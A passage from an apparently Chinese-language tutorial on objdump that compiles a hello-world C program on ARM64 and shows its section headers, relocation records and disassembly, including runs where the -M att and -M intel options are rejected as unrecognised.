-W  顯示檔案中包含有DWARF 除錯資訊格式的區段
10
-t  顯示檔案的符號表
11
-T   顯示動態連結符號表
12
-x   顯示檔案的所有檔頭 --all header

範例程式

1
#include <stdio.h>
2
int main(){
3
   printf("Wu YiHung\n");
4
   return 0;
5
}

編譯指令 gcc -o PLAYGROUND PLAYGROUND.c -g
顯示區段頭section headers(-h)==>objdump -h PLAYGROUND
結果
- 可以從最上面的數據得知，這是由arm架構編譯的
完整結果

1
PLAYGROUND:     file format elf64-littleaarch64
2

3
Sections:
4
Idx Name          Size      VMA               LMA               File off  Algn
5
0 .interp       0000001b  0000000000000238  0000000000000238  00000238  2**0
6
              CONTENTS, ALLOC, LOAD, READONLY, DATA
7
1 .note.gnu.build-id 00000024  0000000000000254  0000000000000254  00000254  2**2
8
              CONTENTS, ALLOC, LOAD, READONLY, DATA
9
2 .note.ABI-tags 00000020  0000000000000278  0000000000000278  00000278  2**2
10
              CONTENTS, ALLOC, LOAD, READONLY, DATA
11
3 .gnu.hash     0000001c  0000000000000298  0000000000000298  00000298  2**3
12
              CONTENTS, ALLOC, LOAD, READONLY, DATA
13
4 .dynsym       000000f0  00000000000002b8  00000000000002b8  000002b8  2**3
14
              CONTENTS, ALLOC, LOAD, READONLY, DATA
15
5 .dynstr       00000092  00000000000003a8  00000000000003a8  000003a8  2**0
16
              CONTENTS, ALLOC, LOAD, READONLY, DATA
17
6 .gnu.version  00000014  000000000000043a  000000000000043a  0000043a  2**1
18
              CONTENTS, ALLOC, LOAD, READONLY, DATA
19
7 .gnu.version_r 00000030  0000000000000450  0000000000000450  00000450  2**3
20
              CONTENTS, ALLOC, LOAD, READONLY, DATA
21
8 .rela.dyn     000000c0  0000000000000480  0000000000000480  00000480  2**3
22
              CONTENTS, ALLOC, LOAD, READONLY, DATA
23
9 .rela.plt     00000078  0000000000000540  0000000000000540  00000540  2**3
24
              CONTENTS, ALLOC, LOAD, READONLY, DATA
25
10 .init         00000018  00000000000005b8  00000000000005b8  000005b8  2**2
26
              CONTENTS, ALLOC, LOAD, READONLY, CODE
27
11 .plt          00000070  00000000000005d0  00000000000005d0  000005d0  2**4
28
              CONTENTS, ALLOC, LOAD, READONLY, CODE
29
12 .text         00000134  0000000000000640  0000000000000640  00000640  2**6
30
              CONTENTS, ALLOC, LOAD, READONLY, CODE
31
13 .fini         00000014  0000000000000774  0000000000000774  00000774  2**2
32
              CONTENTS, ALLOC, LOAD, READONLY, CODE
33
14 .rodata       00000012  0000000000000788  0000000000000788  00000788  2**3
34
              CONTENTS, ALLOC, LOAD, READONLY, DATA
35
15 .eh_frame_hdr 0000003c  000000000000079c  000000000000079c  0000079c  2**2
36
              CONTENTS, ALLOC, LOAD, READONLY, DATA
37
16 .eh_frame     000000ac  00000000000007d8  00000000000007d8  000007d8  2**3
38
              CONTENTS, ALLOC, LOAD, READONLY, DATA
39
17 .init_array   00000008  0000000000010d90  0000000000010d90  00000d90  2**3
40
              CONTENTS, ALLOC, LOAD, DATA
41
18 .fini_array   00000008  0000000000010d98  0000000000010d98  00000d98  2**3
42
              CONTENTS, ALLOC, LOAD, DATA
43
19 .dynamic      000001f0  0000000000010da0  0000000000010da0  00000da0  2**3
44
              CONTENTS, ALLOC, LOAD, DATA
45
20 .got          00000070  0000000000010f90  0000000000010f90  00000f90  2**3
46
              CONTENTS, ALLOC, LOAD, DATA
47
21 .data         00000010  0000000000011000  0000000000011000  00001000  2**3
48
              CONTENTS, ALLOC, LOAD, DATA
49
22 .bss          00000008  0000000000011010  0000000000011010  00001010  2**0
50
              ALLOC
51
23 .comment      0000002b  0000000000000000  0000000000000000  00001010  2**0
52
              CONTENTS, READONLY
53
24 .debug_aranges 00000030  0000000000000000  0000000000000000  0000103b  2**0
54
              CONTENTS, READONLY, DEBUGGING, OCTETS
55
25 .debug_info   0000008c  0000000000000000  0000000000000000  0000106b  2**0
56
              CONTENTS, READONLY, DEBUGGING, OCTETS
57
26 .debug_abbrev 00000043  0000000000000000  0000000000000000  000010f7  2**0
58
              CONTENTS, READONLY, DEBUGGING, OCTETS
59
27 .debug_line   00000052  0000000000000000  0000000000000000  0000113a  2**0
60
              CONTENTS, READONLY, DEBUGGING, OCTETS
61
28 .debug_str    000000c7  0000000000000000  0000000000000000  0000118c  2**0
62
              CONTENTS, READONLY, DEBUGGING, OCTETS
63
29 .debug_line_str 00000023  0000000000000000  0000000000000000  00001253  2**0
64
              CONTENTS, READONLY, DEBUGGING, OCTETS

查看重定表(Relocation Table) Examining the Relocation Section ==> objdump -R PLAYGROUND

1
PLAYGROUND:     file format elf64-littleaarch64
2

3
DYNAMIC RELOCATION RECORDS
4
OFFSET           TYPE              VALUE
5
0000000000010d90 R_AARCH64_RELATIVE  *ABS*+0x0000000000000750
6
0000000000010d98 R_AARCH64_RELATIVE  *ABS*+0x0000000000000700
7
0000000000010ff0 R_AARCH64_RELATIVE  *ABS*+0x0000000000000754
8
0000000000011008 R_AARCH64_RELATIVE  *ABS*+0x0000000000011008
9
0000000000010fd8 R_AARCH64_GLOB_DAT  _ITM_deregisterTMCloneTable@Base
10
0000000000010fe0 R_AARCH64_GLOB_DAT  __cxa_finalize@GLIBC_2.17
11
0000000000010fe8 R_AARCH64_GLOB_DAT  __gmon_start__@Base
12
0000000000010ff8 R_AARCH64_GLOB_DAT  _ITM_registerTMCloneTable@Base
13
0000000000010fa8 R_AARCH64_JUMP_SLOT  __libc_start_main@GLIBC_2.34
14
0000000000010fb0 R_AARCH64_JUMP_SLOT  __cxa_finalize@GLIBC_2.17
15
0000000000010fb8 R_AARCH64_JUMP_SLOT  __gmon_start__@Base
16
0000000000010fc0 R_AARCH64_JUMP_SLOT  abort@GLIBC_2.17
17
0000000000010fc8 R_AARCH64_JUMP_SLOT  puts@GLIBC_2.17

2.objdump逆向分析

指令參數

1
-d  --disassemble
2
    從objfile中對機器指令進行反彙編。本選項只對那些包含指令的section進行反彙編。
3
-D  --disassemble-all
4
    類似於-d，但是本選項會對所有的sections進行反彙編，而不僅僅是那些包含指令的sections。
5
    本選項會微妙的影響程式碼片段的反彙編。當使用-d選項的時候，objdump會假設代碼中出現的所有symbols都在對應
6
    的boundary範圍之內，並且不會跨boundary來進行反彙編； 而當使用-D選項時，則並不會有這樣的假設。這就
7
    意味著-d與-D選項在反彙編時，可能輸出結果會有些不同，比如當資料存放在程式碼片段的情況下。
8
-S 顯示原始碼和反組譯程式碼(包含－d 參數)
9
--prefix-addresses
10
    反彙編的時候，顯示每一行的完整位址。這是一種比較老的反彙編格式

範例1

編譯 gcc -o PLAYGROUND PLAYGROUND.c -g

反編譯1(使用att格式) ==> objdump -S PLAYGROUND (預設:使用AT&T語法)

結果1

1
yih@yih:~/Documents/C$ objdump -S PLAYGROUND
2

3
PLAYGROUND:     file format elf64-littleaarch64
4

5
Disassembly of section .init:
6

7
00000000000005b8 <_init>:
8
 5b8:  d503201f   nop
9
 5bc:  a9bf7bfd   stp  x29, x30, [sp, #-16]!
10
 5c0:  910003fd   mov  x29, sp
11
 5c4:  9400002c   bl  674 <call_weak_fn>
12
 5c8:  a8c17bfd   ldp  x29, x30, [sp], #16
13
 5cc:  d65f03c0   ret
14

15
Disassembly of section .plt:
16

17
00000000000005d0 <.plt>:
18
 5d0:  a9bf7bf0   stp  x16, x30, [sp, #-16]!
19
 5d4:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
20
 5d8:  f947d211   ldr  x17, [x16, #4000]
21
 5dc:  913e8210   add  x16, x16, #0xfa0
22
 5e0:  d61f0220   br  x17
23
 5e4:  d503201f   nop
24
 5e8:  d503201f   nop
25
 5ec:  d503201f   nop
26

27
00000000000005f0 <__libc_start_main@plt>:
28
 5f0:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
29
 5f4:  f947d611   ldr  x17, [x16, #4008]
30
 5f8:  913ea210   add  x16, x16, #0xfa8
31
 5fc:  d61f0220   br  x17
32

33
0000000000000600 <__cxa_finalize@plt>:
34
 600:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
35
 604:  f947da11   ldr  x17, [x16, #4016]
36
 608:  913ec210   add  x16, x16, #0xfb0
37
 60c:  d61f0220   br  x17
38

39
0000000000000610 <__gmon_start__@plt>:
40
 610:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
41
 614:  f947de11   ldr  x17, [x16, #4024]
42
 618:  913ee210   add  x16, x16, #0xfb8
43
 61c:  d61f0220   br  x17
44

45
0000000000000620 <abort@plt>:
46
 620:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
47
 624:  f947e211   ldr  x17, [x16, #4032]
48
 628:  913f0210   add  x16, x16, #0xfc0
49
 62c:  d61f0220   br  x17
50

51
0000000000000630 <puts@plt>:
52
 630:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
53
 634:  f947e611   ldr  x17, [x16, #4040]
54
 638:  913f2210   add  x16, x16, #0xfc8
55
 63c:  d61f0220   br  x17
56

57
Disassembly of section .text:
58

59
0000000000000640 <_start>:
60
 640:  d503201f   nop
61
 644:  d280001d   mov  x29, #0x0                     // #0
62
 648:  d280001e   mov  x30, #0x0                     // #0
63
 64c:  aa0003e5   mov  x5, x0
64
 650:  f94003e1   ldr  x1, [sp]
65
 654:  910023e2   add  x2, sp, #0x8
66
 658:  910003e6   mov  x6, sp
67
 65c:  90000080   adrp  x0, 10000 <__FRAME_END__+0xf780>
68
 660:  f947f800   ldr  x0, [x0, #4080]
69
 664:  d2800003   mov  x3, #0x0                     // #0
70
 668:  d2800004   mov  x4, #0x0                     // #0
71
 66c:  97ffffe1   bl  5f0 <__libc_start_main@plt>
72
 670:  97ffffec   bl  620 <abort@plt>
73

74
0000000000000674 <call_weak_fn>:
75
 674:  90000080   adrp  x0, 10000 <__FRAME_END__+0xf780>
76
 678:  f947f400   ldr  x0, [x0, #4072]
77
 67c:  b4000040   cbz  x0, 684 <call_weak_fn+0x10>
78
 680:  17ffffe4   b  610 <__gmon_start__@plt>
79
 684:  d65f03c0   ret
80
 688:  d503201f   nop
81
 68c:  d503201f   nop
82

83
0000000000000690 <deregister_tm_clones>:
84
 690:  b0000080   adrp  x0, 11000 <__data_start>
85
 694:  91004000   add  x0, x0, #0x10
86
 698:  b0000081   adrp  x1, 11000 <__data_start>
87
 69c:  91004021   add  x1, x1, #0x10
88
 6a0:  eb00003f   cmp  x1, x0
89
 6a4:  540000c0   b.eq  6bc <deregister_tm_clones+0x2c>  // b.none
90
 6a8:  90000081   adrp  x1, 10000 <__FRAME_END__+0xf780>
91
 6ac:  f947ec21   ldr  x1, [x1, #4056]
92
 6b0:  b4000061   cbz  x1, 6bc <deregister_tm_clones+0x2c>
93
 6b4:  aa0103f0   mov  x16, x1
94
 6b8:  d61f0200   br  x16
95
 6bc:  d65f03c0   ret
96

97
00000000000006c0 <register_tm_clones>:
98
 6c0:  b0000080   adrp  x0, 11000 <__data_start>
99
 6c4:  91004000   add  x0, x0, #0x10
100
 6c8:  b0000081   adrp  x1, 11000 <__data_start>
101
 6cc:  91004021   add  x1, x1, #0x10
102
 6d0:  cb000021   sub  x1, x1, x0
103
 6d4:  d37ffc22   lsr  x2, x1, #63
104
 6d8:  8b810c41   add  x1, x2, x1, asr #3
105
 6dc:  9341fc21   asr  x1, x1, #1
106
 6e0:  b40000c1   cbz  x1, 6f8 <register_tm_clones+0x38>
107
 6e4:  90000082   adrp  x2, 10000 <__FRAME_END__+0xf780>
108
 6e8:  f947fc42   ldr  x2, [x2, #4088]
109
 6ec:  b4000062   cbz  x2, 6f8 <register_tm_clones+0x38>
110
 6f0:  aa0203f0   mov  x16, x2
111
 6f4:  d61f0200   br  x16
112
 6f8:  d65f03c0   ret
113
 6fc:  d503201f   nop
114

115
0000000000000700 <__do_global_dtors_aux>:
116
 700:  a9be7bfd   stp  x29, x30, [sp, #-32]!
117
 704:  910003fd   mov  x29, sp
118
 708:  f9000bf3   str  x19, [sp, #16]
119
 70c:  b0000093   adrp  x19, 11000 <__data_start>
120
 710:  39404260   ldrb  w0, [x19, #16]
121
 714:  35000140   cbnz  w0, 73c <__do_global_dtors_aux+0x3c>
122
 718:  90000080   adrp  x0, 10000 <__FRAME_END__+0xf780>
123
 71c:  f947f000   ldr  x0, [x0, #4064]
124
 720:  b4000080   cbz  x0, 730 <__do_global_dtors_aux+0x30>
125
 724:  b0000080   adrp  x0, 11000 <__data_start>
126
 728:  f9400400   ldr  x0, [x0, #8]
127
 72c:  97ffffb5   bl  600 <__cxa_finalize@plt>
128
 730:  97ffffd8   bl  690 <deregister_tm_clones>
129
 734:  52800020   mov  w0, #0x1                     // #1
130
 738:  39004260   strb  w0, [x19, #16]
131
 73c:  f9400bf3   ldr  x19, [sp, #16]
132
 740:  a8c27bfd   ldp  x29, x30, [sp], #32
133
 744:  d65f03c0   ret
134
 748:  d503201f   nop
135
 74c:  d503201f   nop
136

137
0000000000000750 <frame_dummy>:
138
 750:  17ffffdc   b  6c0 <register_tm_clones>
139

140
0000000000000754 <main>:
141
//PLAYGROUND.c
142
#include <stdio.h>
143
int main(){
144
 754:  a9bf7bfd   stp  x29, x30, [sp, #-16]!
145
 758:  910003fd   mov  x29, sp
146
   printf("Wu YiHung\n");
147
 75c:  90000000   adrp  x0, 0 <__abi_tag-0x278>
148
 760:  911e4000   add  x0, x0, #0x790
149
 764:  97ffffb3   bl  630 <puts@plt>
150
   return 0;
151
 768:  52800000   mov  w0, #0x0                     // #0
152
}
153
 76c:  a8c17bfd   ldp  x29, x30, [sp], #16
154
 770:  d65f03c0   ret
155

156
Disassembly of section .fini:
157

158
0000000000000774 <_fini>:
159
 774:  d503201f   nop
160
 778:  a9bf7bfd   stp  x29, x30, [sp, #-16]!
161
 77c:  910003fd   mov  x29, sp
162
 780:  a8c17bfd   ldp  x29, x30, [sp], #16
163
 784:  d65f03c0   ret

反編譯2(使用att格式) ==>objdump -S -M att PLAYGROUND

結果2

1
yih@yih:~/Documents/C$ objdump -S -M att PLAYGROUND
2

3
PLAYGROUND:     file format elf64-littleaarch64
4

5
Disassembly of section .init:
6

7
00000000000005b8 <_init>:
8
 5b8:  objdump: unrecognised disassembler option: att
9
d503201f   nop
10
 5bc:  a9bf7bfd   stp  x29, x30, [sp, #-16]!
11
 5c0:  910003fd   mov  x29, sp
12
 5c4:  9400002c   bl  674 <call_weak_fn>
13
 5c8:  a8c17bfd   ldp  x29, x30, [sp], #16
14
 5cc:  d65f03c0   ret
15

16
Disassembly of section .plt:
17

18
00000000000005d0 <.plt>:
19
 5d0:  a9bf7bf0   stp  x16, x30, [sp, #-16]!
20
 5d4:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
21
 5d8:  f947d211   ldr  x17, [x16, #4000]
22
 5dc:  913e8210   add  x16, x16, #0xfa0
23
 5e0:  d61f0220   br  x17
24
 5e4:  d503201f   nop
25
 5e8:  d503201f   nop
26
 5ec:  d503201f   nop
27

28
00000000000005f0 <__libc_start_main@plt>:
29
 5f0:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
30
 5f4:  f947d611   ldr  x17, [x16, #4008]
31
 5f8:  913ea210   add  x16, x16, #0xfa8
32
 5fc:  d61f0220   br  x17
33

34
0000000000000600 <__cxa_finalize@plt>:
35
 600:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
36
 604:  f947da11   ldr  x17, [x16, #4016]
37
 608:  913ec210   add  x16, x16, #0xfb0
38
 60c:  d61f0220   br  x17
39

40
0000000000000610 <__gmon_start__@plt>:
41
 610:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
42
 614:  f947de11   ldr  x17, [x16, #4024]
43
 618:  913ee210   add  x16, x16, #0xfb8
44
 61c:  d61f0220   br  x17
45

46
0000000000000620 <abort@plt>:
47
 620:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
48
 624:  f947e211   ldr  x17, [x16, #4032]
49
 628:  913f0210   add  x16, x16, #0xfc0
50
 62c:  d61f0220   br  x17
51

52
0000000000000630 <puts@plt>:
53
 630:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
54
 634:  f947e611   ldr  x17, [x16, #4040]
55
 638:  913f2210   add  x16, x16, #0xfc8
56
 63c:  d61f0220   br  x17
57

58
Disassembly of section .text:
59

60
0000000000000640 <_start>:
61
 640:  d503201f   nop
62
 644:  d280001d   mov  x29, #0x0                     // #0
63
 648:  d280001e   mov  x30, #0x0                     // #0
64
 64c:  aa0003e5   mov  x5, x0
65
 650:  f94003e1   ldr  x1, [sp]
66
 654:  910023e2   add  x2, sp, #0x8
67
 658:  910003e6   mov  x6, sp
68
 65c:  90000080   adrp  x0, 10000 <__FRAME_END__+0xf780>
69
 660:  f947f800   ldr  x0, [x0, #4080]
70
 664:  d2800003   mov  x3, #0x0                     // #0
71
 668:  d2800004   mov  x4, #0x0                     // #0
72
 66c:  97ffffe1   bl  5f0 <__libc_start_main@plt>
73
 670:  97ffffec   bl  620 <abort@plt>
74

75
0000000000000674 <call_weak_fn>:
76
 674:  90000080   adrp  x0, 10000 <__FRAME_END__+0xf780>
77
 678:  f947f400   ldr  x0, [x0, #4072]
78
 67c:  b4000040   cbz  x0, 684 <call_weak_fn+0x10>
79
 680:  17ffffe4   b  610 <__gmon_start__@plt>
80
 684:  d65f03c0   ret
81
 688:  d503201f   nop
82
 68c:  d503201f   nop
83

84
0000000000000690 <deregister_tm_clones>:
85
 690:  b0000080   adrp  x0, 11000 <__data_start>
86
 694:  91004000   add  x0, x0, #0x10
87
 698:  b0000081   adrp  x1, 11000 <__data_start>
88
 69c:  91004021   add  x1, x1, #0x10
89
 6a0:  eb00003f   cmp  x1, x0
90
 6a4:  540000c0   b.eq  6bc <deregister_tm_clones+0x2c>  // b.none
91
 6a8:  90000081   adrp  x1, 10000 <__FRAME_END__+0xf780>
92
 6ac:  f947ec21   ldr  x1, [x1, #4056]
93
 6b0:  b4000061   cbz  x1, 6bc <deregister_tm_clones+0x2c>
94
 6b4:  aa0103f0   mov  x16, x1
95
 6b8:  d61f0200   br  x16
96
 6bc:  d65f03c0   ret
97

98
00000000000006c0 <register_tm_clones>:
99
 6c0:  b0000080   adrp  x0, 11000 <__data_start>
100
 6c4:  91004000   add  x0, x0, #0x10
101
 6c8:  b0000081   adrp  x1, 11000 <__data_start>
102
 6cc:  91004021   add  x1, x1, #0x10
103
 6d0:  cb000021   sub  x1, x1, x0
104
 6d4:  d37ffc22   lsr  x2, x1, #63
105
 6d8:  8b810c41   add  x1, x2, x1, asr #3
106
 6dc:  9341fc21   asr  x1, x1, #1
107
 6e0:  b40000c1   cbz  x1, 6f8 <register_tm_clones+0x38>
108
 6e4:  90000082   adrp  x2, 10000 <__FRAME_END__+0xf780>
109
 6e8:  f947fc42   ldr  x2, [x2, #4088]
110
 6ec:  b4000062   cbz  x2, 6f8 <register_tm_clones+0x38>
111
 6f0:  aa0203f0   mov  x16, x2
112
 6f4:  d61f0200   br  x16
113
 6f8:  d65f03c0   ret
114
 6fc:  d503201f   nop
115

116
0000000000000700 <__do_global_dtors_aux>:
117
 700:  a9be7bfd   stp  x29, x30, [sp, #-32]!
118
 704:  910003fd   mov  x29, sp
119
 708:  f9000bf3   str  x19, [sp, #16]
120
 70c:  b0000093   adrp  x19, 11000 <__data_start>
121
 710:  39404260   ldrb  w0, [x19, #16]
122
 714:  35000140   cbnz  w0, 73c <__do_global_dtors_aux+0x3c>
123
 718:  90000080   adrp  x0, 10000 <__FRAME_END__+0xf780>
124
 71c:  f947f000   ldr  x0, [x0, #4064]
125
 720:  b4000080   cbz  x0, 730 <__do_global_dtors_aux+0x30>
126
 724:  b0000080   adrp  x0, 11000 <__data_start>
127
 728:  f9400400   ldr  x0, [x0, #8]
128
 72c:  97ffffb5   bl  600 <__cxa_finalize@plt>
129
 730:  97ffffd8   bl  690 <deregister_tm_clones>
130
 734:  52800020   mov  w0, #0x1                     // #1
131
 738:  39004260   strb  w0, [x19, #16]
132
 73c:  f9400bf3   ldr  x19, [sp, #16]
133
 740:  a8c27bfd   ldp  x29, x30, [sp], #32
134
 744:  d65f03c0   ret
135
 748:  d503201f   nop
136
 74c:  d503201f   nop
137

138
0000000000000750 <frame_dummy>:
139
 750:  17ffffdc   b  6c0 <register_tm_clones>
140

141
0000000000000754 <main>:
142
//PLAYGROUND.c
143
#include <stdio.h>
144
int main(){
145
 754:  a9bf7bfd   stp  x29, x30, [sp, #-16]!
146
 758:  910003fd   mov  x29, sp
147
   printf("Wu YiHung\n");
148
 75c:  90000000   adrp  x0, 0 <__abi_tag-0x278>
149
 760:  911e4000   add  x0, x0, #0x790
150
 764:  97ffffb3   bl  630 <puts@plt>
151
   return 0;
152
 768:  52800000   mov  w0, #0x0                     // #0
153
}
154
 76c:  a8c17bfd   ldp  x29, x30, [sp], #16
155
 770:  d65f03c0   ret
156

157
Disassembly of section .fini:
158

159
0000000000000774 <_fini>:
160
 774:  d503201f   nop
161
 778:  a9bf7bfd   stp  x29, x30, [sp, #-16]!
162
 77c:  910003fd   mov  x29, sp
163
 780:  a8c17bfd   ldp  x29, x30, [sp], #16
164
 784:  d65f03c0   ret

反編譯3(使用intel格式) ==>objdump -S -M intel PLAYGROUND

結果3

1
yih@yih:~/Documents/C$ objdump -S -M intel PLAYGROUND
2

3
PLAYGROUND:     file format elf64-littleaarch64
4

5
Disassembly of section .init:
6

7
00000000000005b8 <_init>:
8
 5b8:  objdump: unrecognised disassembler option: intel
9
d503201f   nop
10
 5bc:  a9bf7bfd   stp  x29, x30, [sp, #-16]!
11
 5c0:  910003fd   mov  x29, sp
12
 5c4:  9400002c   bl  674 <call_weak_fn>
13
 5c8:  a8c17bfd   ldp  x29, x30, [sp], #16
14
 5cc:  d65f03c0   ret
15

16
Disassembly of section .plt:
17

18
00000000000005d0 <.plt>:
19
 5d0:  a9bf7bf0   stp  x16, x30, [sp, #-16]!
20
 5d4:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
21
 5d8:  f947d211   ldr  x17, [x16, #4000]
22
 5dc:  913e8210   add  x16, x16, #0xfa0
23
 5e0:  d61f0220   br  x17
24
 5e4:  d503201f   nop
25
 5e8:  d503201f   nop
26
 5ec:  d503201f   nop
27

28
00000000000005f0 <__libc_start_main@plt>:
29
 5f0:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
30
 5f4:  f947d611   ldr  x17, [x16, #4008]
31
 5f8:  913ea210   add  x16, x16, #0xfa8
32
 5fc:  d61f0220   br  x17
33

34
0000000000000600 <__cxa_finalize@plt>:
35
 600:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
36
 604:  f947da11   ldr  x17, [x16, #4016]
37
 608:  913ec210   add  x16, x16, #0xfb0
38
 60c:  d61f0220   br  x17
39

40
0000000000000610 <__gmon_start__@plt>:
41
 610:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
42
 614:  f947de11   ldr  x17, [x16, #4024]
43
 618:  913ee210   add  x16, x16, #0xfb8
44
 61c:  d61f0220   br  x17
45

46
0000000000000620 <abort@plt>:
47
 620:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
48
 624:  f947e211   ldr  x17, [x16, #4032]
49
 628:  913f0210   add  x16, x16, #0xfc0
50
 62c:  d61f0220   br  x17
51

52
0000000000000630 <puts@plt>:
53
 630:  90000090   adrp  x16, 10000 <__FRAME_END__+0xf780>
54
 634:  f947e611   ldr  x17, [x16, #4040]
55
 638:  913f2210   add  x16, x16, #0xfc8
56
 63c:  d61f0220   br  x17
57

58
Disassembly of section .text:
59

60
0000000000000640 <_start>:
61
 640:  d503201f   nop
62
 644:  d280001d   mov  x29, #0x0                     // #0
63
 648:  d280001e   mov  x30, #0x0                     // #0
64
 64c:  aa0003e5   mov  x5, x0
65
 650:  f94003e1   ldr  x1, [sp]
66
 654:  910023e2   add  x2, sp, #0x8
67
 658:  910003e6   mov  x6, sp
68
 65c:  90000080   adrp  x0, 10000 <__FRAME_END__+0xf780>
69
 660:  f947f800   ldr  x0, [x0, #4080]
70
 664:  d2800003   mov  x3, #0x0                     // #0
71
 668:  d2800004   mov  x4, #0x0                     // #0
72
 66c:  97ffffe1   bl  5f0 <__libc_start_main@plt>
73
 670:  97ffffec   bl  620 <abort@plt>
74
0000000000000674 <call_weak_fn>:
75
 674:  90000080   adrp  x0, 10000 <__FRAME_END__+0xf780>
76
 678:  f947f400   ldr  x0, [x0, #4072]
77
 67c:  b4000040   cbz  x0, 684 <call_weak_fn+0x10>
78
 680:  17ffffe4   b  610 <__gmon_start__@plt>
79
 684:  d65f03c0   ret
80
 688:  d503201f   nop
81
 68c:  d503201f   nop
82

83
0000000000000690 <deregister_tm_clones>:
84
 690:  b0000080   adrp  x0, 11000 <__data_start>
85
 694:  91004000   add  x0, x0, #0x10
86
 698:  b0000081   adrp  x1, 11000 <__data_start>
87
 69c:  91004021   add  x1, x1, #0x10
88
 6a0:  eb00003f   cmp  x1, x0
89
 6a4:  540000c0   b.eq  6bc <deregister_tm_clones+0x2c>  // b.none
90
 6a8:  90000081   adrp  x1, 10000 <__FRAME_END__+0xf780>
91
 6ac:  f947ec21   ldr  x1, [x1, #4056]
92
 6b0:  b4000061   cbz  x1, 6bc <deregister_tm_clones+0x2c>
93
 6b4:  aa0103f0   mov  x16, x1
94
 6b8:  d61f0200   br  x16
95
 6bc:  d65f03c0   ret
96

97
00000000000006c0 <register_tm_clones>:
98
 6c0:  b0000080   adrp  x0, 11000 <__data_start>
99
 6c4:  91004000   add  x0, x0, #0x10
100
 6c8:  b0000081   adrp  x1, 11000 <__data_start>
101
 6cc:  91004021   add  x1, x1, #0x10
102
 6d0:  cb000021   sub  x1, x1, x0
103
 6d4:  d37ffc22   lsr  x2, x1, #63
104
 6d8:  8b810c41   add  x1, x2, x1, asr #3
105
 6dc:  9341fc21   asr  x1, x1, #1
106
 6e0:  b40000c1   cbz  x1, 6f8 <register_tm_clones+0x38>
107
 6e4:  90000082   adrp  x2, 10000 <__FRAME_END__+0xf780>
108
 6e8:  f947fc42   ldr  x2, [x2, #4088]
109
 6ec:  b4000062   cbz  x2, 6f8 <register_tm_clones+0x38>
110
 6f0:  aa0203f0   mov  x16, x2
111
 6f4:  d61f0200   br  x16
112
 6f8:  d65f03c0   ret
113
 6fc:  d503201f   nop
114

115
0000000000000700 <__do_global_dtors_aux>:
116
 700:  a9be7bfd   stp  x29, x30, [sp, #-32]!
117
 704:  910003fd   mov  x29, sp
118
 708:  f9000bf3   str  x19, [sp, #16]
119
 70c:  b0000093   adrp  x19, 11000 <__data_start>
120
 710:  39404260   ldrb  w0, [x19, #16]
121
 714:  35000140   cbnz  w0, 73c <__do_global_dtors_aux+0x3c>
122
 718:  90000080   adrp  x0, 10000 <__FRAME_END__+0xf780>
123
 71c:  f947f000   ldr  x0, [x0, #4064]
124
 720:  b4000080   cbz  x0, 730 <__do_global_dtors_aux+0x30>
125
 724:  b0000080   adrp  x0, 11000 <__data_start>
126
 728:  f9400400   ldr  x0, [x0, #8]
127
 72c:  97ffffb5   bl  600 <__cxa_finalize@plt>
128
 730:  97ffffd8   bl  690 <deregister_tm_clones>
129
 734:  52800020   mov  w0, #0x1                     // #1
130
 738:  39004260   strb  w0, [x19, #16]
131
 73c:  f9400bf3   ldr  x19, [sp, #16]
132
 740:  a8c27bfd   ldp  x29, x30, [sp], #32
133
 744:  d65f03c0   ret
134
 748:  d503201f   nop
135
 74c:  d503201f   nop
136

137
0000000000000750 <frame_dummy>:
138
 750:  17ffffdc   b  6c0 <register_tm_clones>
139

140
0000000000000754 <main>:
141
//PLAYGROUND.c
142
#include <stdio.h>
143
int main(){
144
 754:  a9bf7bfd   stp  x29, x30, [sp, #-16]!
145
 758:  910003fd   mov  x29, sp
146
   printf("Wu YiHung\n");
147
 75c:  90000000   adrp  x0, 0 <__abi_tag-0x278>
148
 760:  911e4000   add  x0, x0, #0x790
149
 764:  97ffffb3   bl  630 <puts@plt>
150
   return 0;
151
 768:  52800000   mov  w0, #0x0                     // #0
152
}
153
 76c:  a8c17bfd   ldp  x29, x30, [sp], #16
154
 770:  d65f03c0   ret
155

156
Disassembly of section .fini:
157

158
0000000000000774 <_fini>:
159
 774:  d503201f   nop
160
 778:  a9bf7bfd   stp  x29, x30, [sp, #-16]!
161
 77c:  910003fd   mov  x29, sp
162
 780:  a8c17bfd   ldp  x29, x30, [sp], #16
163
 784:  d65f03c0   ret

反編譯4 ==> objdump -S -j .text -M intel PLAYGROUND

結果4

1
yih@yih:~/Documents/C$ objdump -S -j .text -M intel PLAYGROUND
2

3
PLAYGROUND:     file format elf64-littleaarch64
4

5
Disassembly of section .text:
6

7
0000000000000640 <_start>:
8
 640:  objdump: unrecognised disassembler option: intel
9
d503201f   nop
10
 644:  d280001d   mov  x29, #0x0                     // #0
11
 648:  d280001e   mov  x30, #0x0                     // #0
12
 64c:  aa0003e5   mov  x5, x0
13
 650:  f94003e1   ldr  x1, [sp]
14
 654:  910023e2   add  x2, sp, #0x8
15
 658:  910003e6   mov  x6, sp
16
 65c:  90000080   adrp  x0, 10000 <__FRAME_END__+0xf780>
17
 660:  f947f800   ldr  x0, [x0, #4080]
18
 664:  d2800003   mov  x3, #0x0                     // #0
19
 668:  d2800004   mov  x4, #0x0                     // #0
20
 66c:  97ffffe1   bl  5f0 <__libc_start_main@plt>
21
 670:  97ffffec   bl  620 <abort@plt>
22

23
0000000000000674 <call_weak_fn>:
24
 674:  90000080   adrp  x0, 10000 <__FRAME_END__+0xf780>
25
 678:  f947f400   ldr  x0, [x0, #4072]
26
 67c:  b4000040   cbz  x0, 684 <call_weak_fn+0x10>
27
 680:  17ffffe4   b  610 <__gmon_start__@plt>
28
 684:  d65f03c0   ret
29
